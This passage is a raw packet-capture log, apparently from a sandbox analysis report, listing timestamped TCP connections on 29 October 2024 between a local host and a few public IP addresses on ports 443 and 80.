                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.746258974 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.746268034 CET60601443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.746272087 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.748775005 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.748831034 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.748831034 CET60609443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.748866081 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.748924017 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.748927116 CET60609443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.749087095 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.749109030 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.749175072 CET60609443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.749190092 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.750507116 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.750567913 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.750993013 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.750997066 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.751296997 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.751301050 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.885524035 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.885812044 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.886056900 CET60607443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.886096001 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.886152029 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.886539936 CET60605443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.886560917 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.886684895 CET60607443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.886697054 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.887025118 CET60605443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.887034893 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.887052059 CET60606443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.887072086 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.887424946 CET60606443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.887429953 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942540884 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942612886 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942622900 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942661047 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942688942 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942759037 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942770958 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942783117 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942805052 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.942821980 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.017488956 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.017568111 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.017616034 CET60606443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.017951965 CET60606443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.017963886 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.018068075 CET60606443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.018073082 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.019606113 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.019702911 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.019784927 CET60607443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.019937038 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.020083904 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.020229101 CET60605443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.020550966 CET60607443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.020586967 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.020612955 CET60607443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.020627022 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.021600008 CET60605443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.021616936 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.021640062 CET60605443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.021650076 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.022728920 CET60610443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.022768974 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.022991896 CET60610443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.030436993 CET60611443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.030467987 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.030519962 CET60611443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.032628059 CET60610443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.032650948 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.033135891 CET60611443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.033149004 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.039467096 CET60612443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.039495945 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.039561033 CET60612443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.039707899 CET60612443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.039720058 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.487407923 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.487950087 CET60609443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.487978935 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.488666058 CET60609443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.488671064 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.493343115 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.494060040 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.494096994 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.494509935 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.494524956 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.619602919 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.619805098 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.619851112 CET60609443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.620223045 CET60609443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.620240927 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.620254040 CET60609443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.620259047 CET4436060913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.625641108 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.625669956 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.625737906 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.625762939 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.625813007 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.626374960 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.626413107 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.626440048 CET60608443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.626454115 CET4436060813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.626593113 CET60613443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.626641989 CET4436061313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.626705885 CET60613443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.627428055 CET60613443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.627441883 CET4436061313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.636542082 CET60614443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.636569023 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.636815071 CET60614443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.637043953 CET60614443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.637053967 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.771466970 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.771924019 CET60612443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.771949053 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.772418976 CET60612443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.772424936 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.772888899 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.773391008 CET60610443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.773416042 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.773847103 CET60610443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.773859024 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.793620110 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.794140100 CET60611443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.794167995 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.794603109 CET60611443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.794609070 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.820123911 CET6061580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.825599909 CET806061564.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.825685024 CET6061580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.825922012 CET6061580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.831259012 CET806061564.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.901551962 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.901635885 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.901828051 CET60612443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.901953936 CET60612443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.901972055 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.901982069 CET60612443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.901987076 CET4436061213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.903994083 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.904030085 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.904083967 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.904139042 CET60610443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.904253960 CET60610443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.904253960 CET60610443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.904278994 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.904301882 CET4436061013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.905273914 CET60616443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.905308008 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.905455112 CET60616443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.905647993 CET60616443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.905658960 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.906660080 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.906697035 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.906940937 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.907064915 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.907074928 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.924535990 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.924602032 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.924653053 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.924709082 CET60611443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.924853086 CET60611443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.924875021 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.924885035 CET60611443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.924890041 CET4436061113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.927671909 CET60618443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.927680016 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.927762032 CET60618443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.927920103 CET60618443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:00.927926064 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.357620955 CET4436061313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.358099937 CET60613443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.358125925 CET4436061313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.358572006 CET60613443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.358578920 CET4436061313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.370187998 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.370620966 CET60614443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.370650053 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.371150970 CET60614443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.371197939 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.500514984 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.500592947 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.500873089 CET60614443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.502129078 CET60614443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.502151966 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.502170086 CET60614443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.502177000 CET4436061413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.510881901 CET60619443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.510934114 CET4436061913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.511003971 CET60619443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.511368990 CET60619443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.511384964 CET4436061913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.514235020 CET4436061313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.514319897 CET4436061313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.514962912 CET60613443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.520275116 CET60613443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.520293951 CET4436061313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.523587942 CET60620443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.523674011 CET4436062013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.523823023 CET60620443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.524144888 CET60620443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.524178028 CET4436062013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.642075062 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.642700911 CET60616443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.642728090 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.643306971 CET60616443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.643311024 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.657669067 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.658233881 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.658255100 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.658766985 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.658771038 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.673923016 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.674496889 CET60618443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.674505949 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.675041914 CET60618443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.675045967 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.755189896 CET806061564.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.755228996 CET806061564.233.166.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.755255938 CET6061580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.755291939 CET6061580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.755698919 CET6061580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.755723953 CET6061580192.168.2.564.233.166.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.774508953 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.774579048 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.774681091 CET60616443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.775012016 CET60616443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.775033951 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.775048018 CET60616443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.775053978 CET4436061613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.779352903 CET60621443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.779392004 CET4436062113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.779934883 CET60621443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.779934883 CET60621443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.779974937 CET4436062113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789426088 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789540052 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789597988 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789623976 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789673090 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789885044 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789905071 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789916992 CET60617443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.789928913 CET4436061713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.792546988 CET60622443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.792592049 CET4436062213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.792694092 CET60622443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.792850018 CET60622443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.792864084 CET4436062213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.806339979 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.806431055 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.806605101 CET60618443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.806636095 CET60618443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.806636095 CET60618443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.806647062 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.806658030 CET4436061813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.809434891 CET60623443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.809463978 CET4436062313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.809622049 CET60623443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.809822083 CET60623443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:01.809833050 CET4436062313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:02.396481991 CET4436061913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:02.397046089 CET60619443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:02.397062063 CET4436061913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:02.397829056 CET60619443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:02.397838116 CET4436061913.107.246.45192.168.2.5
